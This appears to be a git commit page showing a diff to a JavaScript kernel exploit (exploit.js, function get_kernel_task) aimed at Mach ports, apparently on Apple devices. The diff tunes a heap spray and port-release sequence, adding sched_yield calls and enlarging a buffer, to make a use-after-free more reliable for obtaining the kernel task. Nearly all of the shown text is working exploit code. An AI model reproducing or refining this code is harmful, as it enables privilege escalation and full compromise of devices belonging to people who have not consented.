fuck

author: spv420 <spv@spv.sh> 2022-07-27 16:32:09 -0400
committer: spv420 <spv@spv.sh> 2022-07-27 16:32:09 -0400
commit: aec8b9b545c57aabf69fb1be079bfed7a675c484 (patch)
tree: 288d9069acd4f4302fd0a52479e18b361009db9a /src/js/kexp
parent: 21744449381360e43025dbc2e9861adbcdc0625e (diff)
1 files changed, 6 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index d42457e..6870963 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -462,11 +462,13 @@ function get_kernel_task() {
 
 again: while (true) {
 
+	sched_yield();
 	var dummy = shit_heap(4);
 	for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
 		spray(big_buf, big_size, dummy);
 	}
 
+	sched_yield();
 	var dummy = shit_heap(4);
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
@@ -477,15 +479,18 @@ again: while (true) {
 		spray(small_buf, small_size, dummy);
 	}
 
+	sched_yield();
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
 		release_port_ptrs(read_u32(fp + (i << 2)));
 	}
 
 
-	var arrmpt = shit_heap(8);
+	var arrmpt = shit_heap(16);
 	write_u32(arrmpt, 0);
 	write_u32(arrmpt + 4, 0);
+	write_u32(arrmpt + 8, 0);
+	write_u32(arrmpt + 12, 0);
 	mach_ports_lookup_shit_dealloc();
 	var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
 	mach_ports_lookup_shit();
author	spv420 <spv@spv.sh>	2022-07-27 16:32:09 -0400
committer	spv420 <spv@spv.sh>	2022-07-27 16:32:09 -0400
commit	aec8b9b545c57aabf69fb1be079bfed7a675c484 (patch)
tree	288d9069acd4f4302fd0a52479e18b361009db9a /src/js/kexp
parent	21744449381360e43025dbc2e9861adbcdc0625e (diff)